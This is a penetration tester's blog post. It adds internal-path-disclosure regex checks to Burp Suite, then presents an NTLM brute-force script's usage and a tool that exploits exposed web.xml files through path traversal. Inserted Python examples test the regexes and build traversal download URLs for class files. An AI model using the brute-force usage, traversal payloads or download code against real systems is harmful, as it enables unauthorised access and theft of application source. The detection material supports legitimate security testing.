Tuesday, March 23, 2021

Burp Suite - Adding Internal Path Disclosure Capabilities

Hi guys, I hope everyone is healthy.

If you work with Burp Suite, you may have noticed that Burp cannot identify Internal Path Disclosure vulnerabilities by default.

I know that most of the time this vulnerability is ranked as Informational or Low, but I decided to write this after using the information obtained from an internal path leak to perform a more complex attack chain.

For that reason, the vulnerability was ranked as High because of the overall impact. In other words, I would not have been able to build an effective attack chain without the leaked path.

The implementation is quite simple:

Install the Burp Bounty extension (unfortunately, it is available for Burp Pro only).
On the Profiles tab, go to Passive Response Profiles -> Add.
Fill in the fields (Response) and click Add.
Here you add the regex you are looking for. It is possible to add more than one regex. In my case, I created two different profiles, one for Windows issues and another one for Linux.

The regexes for both cases:

Linux:  (?<!\S)(?:/[^/\s>]+)+
Thanks to codeworm for the help with the Linux regex.

Windows: ([a-zA-Z]):\\?(\\[a-zA-Z0-9._-].*\s.*+)+\\
The Windows regex still needs some enhancements.
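Before loading a profile into Burp Bounty it is worth checking what its regex will and will not flag. The following harness is an added example of mine, not code from this post or from the Burp Bounty extension: it runs the post's Linux regex, an assumed relaxed variant of it, and an assumed Windows pattern over constructed response bodies. The relaxed variant, the Windows pattern, the profile names and the sample bodies are all my assumptions. The post's own Windows regex is not used here because its possessive `.*+` quantifier is Java regex syntax, which Python's re module only accepts from 3.11 on.

```python
import re
from typing import Dict, List

# Regex from the post's Linux profile. Burp Bounty matches with Java regex;
# this pattern is valid unchanged for Python's re module.
LINUX_POST_RE = re.compile(r"(?<!\S)(?:/[^/\s>]+)+")

# Assumed variant (not from the post): also accept a path that directly
# follows '>' or '(' and stop at '<', so that PHP's html_errors=On output
# ("... in <b>/var/www/...</b> on line ...") is caught as well.
LINUX_RELAXED_RE = re.compile(r"(?<![^\s>(])(?:/[^/\s<>]+)+")

# Assumed Windows pattern (not the post's): the post's version uses a
# possessive quantifier (.*+), Java syntax that Python's re only accepts from
# 3.11 on, and the author notes it still needs work. This one requires a
# drive letter and ':\', then backslash-separated components containing none
# of the characters Windows forbids in file names.
WINDOWS_RE = re.compile(r'\b[A-Za-z]:\\(?:[^\\/:*?"<>|\s]+\\)*[^\\/:*?"<>|\s]*')

PROFILES: Dict[str, re.Pattern] = {
    "linux (post)": LINUX_POST_RE,
    "linux (relaxed, assumed)": LINUX_RELAXED_RE,
    "windows (assumed)": WINDOWS_RE,
}

# Constructed response bodies (not captured from any real target).
SAMPLES: Dict[str, str] = {
    # PHP warning with html_errors=Off: the path follows a space.
    "php_warning_plain": (
        "Warning: include(config.php): failed to open stream: "
        "No such file or directory in /var/www/html/app/index.php on line 12\n"
    ),
    # Same warning with html_errors=On: the path follows '<b>'.
    "php_warning_html": (
        "<b>Warning</b>:  include(config.php): failed to open stream: "
        "No such file or directory in <b>/var/www/html/app/index.php</b> "
        "on line <b>12</b><br />\n"
    ),
    # ASP.NET stack trace frame carrying a compile-time source path.
    "aspnet_stack_trace": (
        "[FileNotFoundException: Could not find file]\n"
        "   App.Default.Page_Load(Object sender, EventArgs e) "
        "in C:\\inetpub\\wwwroot\\app\\Default.aspx.cs:line 42\n"
    ),
    # Ordinary HTML: URL paths inside quoted attributes must not fire.
    "html_links_only": (
        '<a href="/www-community/attacks/Full_Path_Disclosure">FPD</a>\n'
        '<script src="/assets/js/main.js"></script>\n'
    ),
}


def scan(body: str) -> Dict[str, List[str]]:
    """Run every profile regex over one response body, like a passive check."""
    return {name: rx.findall(body) for name, rx in PROFILES.items()}


def scan_all(samples: Dict[str, str] = SAMPLES) -> Dict[str, Dict[str, List[str]]]:
    """Map each sample id to the matches every profile produced on it."""
    return {sid: scan(body) for sid, body in samples.items()}


if __name__ == "__main__":
    for sid, hits in scan_all().items():
        print(sid)
        for name, matches in hits.items():
            print(f"  {name:26s} {matches}")
```

Running it shows the post's Linux regex matching the plain-text PHP warning and staying quiet on URL paths inside quoted attributes, but missing the same warning when PHP wraps the path in `<b>` tags: the `(?<!\S)` lookbehind rejects a path that directly follows `>`. The relaxed variant catches that case, and the Windows pattern pulls the source path out of the stack trace without swallowing the `:line 42` suffix. Gaps like the `<b>` one are a good reason to keep the profile's Confidence rating below Certain.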

The new issues (screenshots in the original post).

Now, some extra configuration is required for Burp to show the issue properly on the Target tab.
Click on the Issue tab and fill in the fields. Severity and Confidence must be selected; you are free to pick the rating you want. The issue detail is the information that will be displayed on the Target tab.


After you have added all the information, click OK and double-check that everything was saved. Sometimes the extension does not save the regex, and then you must add it again.

Testing your new issues:

Navigate to: https://owasp.org/www-community/attacks/Full_Path_Disclosure and run a passive scan on this page.

Your Burp should show something like this (screenshot in the original post).


Note: the Severity and Confidence are different on purpose, just to show that the two issues can be rated differently.



Checking the matches in the source code (screenshots of the Linux and Windows matches in the original post).

That's it, guys!
Once I update the Windows regex, I will update the post.

WebNBF
https://github.com/crashbrz/WebNBF

Simple Bash "multitask" web NTLM authentication brute-forcer.

Usage/Help
./webnbf.sh <userlist> <passwordlist> https://target

Proxy

Add or remove the curl proxy parameters according to your environment.

WebXmlExploiter
https://github.com/crashbrz/WebXmlExploiter

WebXmlExploiter is a tool to exploit web.xml files exposed by misconfiguration or path traversal.
It will try to download all .class and XML files based on the information extracted from the web.xml file.

Notes
WebXmlExploiter is an exploitation tool only, not a vulnerability scanner.
I will not add a brute-forcing feature, since tools like wfuzz, ffuf, and Burp Suite do it better.
I recommend running jadx to decompile the .class files.
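The step that turns a leaked web.xml into a download list is the mapping from the class names and file paths it declares to URLs under the same traversal that exposed it. The following is an added example of mine, not WebXmlExploiter's own code: it parses a constructed web.xml, maps each declared class to its expected path under WEB-INF/classes, picks up .xml files referenced from init-params, and joins them onto the URL of the exposed WEB-INF/ directory. The sample web.xml, the list of library package prefixes to skip, and the handling of non-WEB-INF paths are my assumptions.

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed web.xml (not taken from any real application). It mixes the
# element kinds that matter here: classes the app ships itself, a class that
# comes from a framework jar, and an init-param pointing at another XML file.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <listener>
    <listener-class>com.example.app.StartupListener</listener-class>
  </listener>
  <filter>
    <filter-name>auth</filter-name>
    <filter-class>com.example.app.security.AuthFilter</filter-class>
  </filter>
  <servlet>
    <servlet-name>admin</servlet-name>
    <servlet-class>com.example.app.web.AdminServlet</servlet-class>
    <init-param>
      <param-name>config</param-name>
      <param-value>/WEB-INF/admin-config.xml</param-value>
    </init-param>
  </servlet>
  <servlet>
    <servlet-name>faces</servlet-name>
    <servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
  </servlet>
</web-app>
"""

CLASS_TAGS = {"servlet-class", "filter-class", "listener-class"}

# Assumption: classes in these packages live in jars under WEB-INF/lib, not as
# loose .class files under WEB-INF/classes, so requesting them only adds noise.
LIBRARY_PREFIXES = ("java.", "javax.", "jakarta.", "org.apache.", "org.springframework.")


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags."""
    return tag.rsplit("}", 1)[-1]


def class_names(web_xml: str) -> List[str]:
    """Fully qualified class names declared in web.xml, in document order."""
    root = ET.fromstring(web_xml)
    return [el.text.strip() for el in root.iter()
            if _local(el.tag) in CLASS_TAGS and el.text]


def referenced_xml(web_xml: str) -> List[str]:
    """Absolute webapp paths of .xml files named in param-value elements."""
    root = ET.fromstring(web_xml)
    return [el.text.strip() for el in root.iter()
            if _local(el.tag) == "param-value" and el.text
            and el.text.strip().endswith(".xml")]


def class_to_relpath(fqcn: str) -> str:
    """com.example.Foo -> classes/com/example/Foo.class, relative to WEB-INF/."""
    return "classes/" + fqcn.replace(".", "/") + ".class"


def webapp_path_to_relpath(path: str) -> str:
    """Turn an absolute webapp path into one relative to WEB-INF/ (assumed layout)."""
    if path.startswith("/WEB-INF/"):
        return path[len("/WEB-INF/"):]
    return "../" + path.lstrip("/")


def download_targets(web_xml: str, webinf_url: str) -> List[str]:
    """URLs to request, given the URL that served the exposed WEB-INF/ directory.

    Plain string joining is deliberate: urllib.parse.urljoin would resolve the
    '../' segments and destroy the path traversal that exposed the file.
    """
    base = webinf_url.rstrip("/") + "/"
    rels = [class_to_relpath(c) for c in class_names(web_xml)
            if not c.startswith(LIBRARY_PREFIXES)]
    rels += [webapp_path_to_relpath(p) for p in referenced_xml(web_xml)]
    return [base + r for r in rels]


if __name__ == "__main__":
    base_url = "https://vulnapp/somedir/anotherdir/../../../WEB-INF/"
    for url in download_targets(SAMPLE_WEB_XML, base_url):
        print(url)
```

With the traversal URL from the usage example below as the base, the output lists the three application classes under `WEB-INF/classes/` and the referenced `admin-config.xml`, while `javax.faces.webapp.FacesServlet` is skipped as a library class. The downloaded .class files are what you would then feed to jadx.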

Installation
Download the latest release and unpack it in the desired location.
Remember to install Go if you want to run it from source.
WebXmlExploiter uses the github.com/antchfx/xmlquery library.

Check the following link for more information: https://github.com/antchfx/xmlquery/

Run go get github.com/antchfx/xmlquery before running WebXmlExploiter.

License
WebXmlExploiter is licensed under the SushiWare license. Check docs/license.txt for more information.
Usage/Help

Please refer to the output of -h for usage information and general help. Also, you can contact me on ##spoonfed@freenode.org (two #)


Example: go run webxmlexploiter.go -u https://vulnapp/somedir/anotherdir/../../../WEB-INF/

Go Version

Tested on:
go version go1.14.4 windows/amd64
go version go1.15.2 linux/amd64

To Do
Parsing enhancements
Add cookie support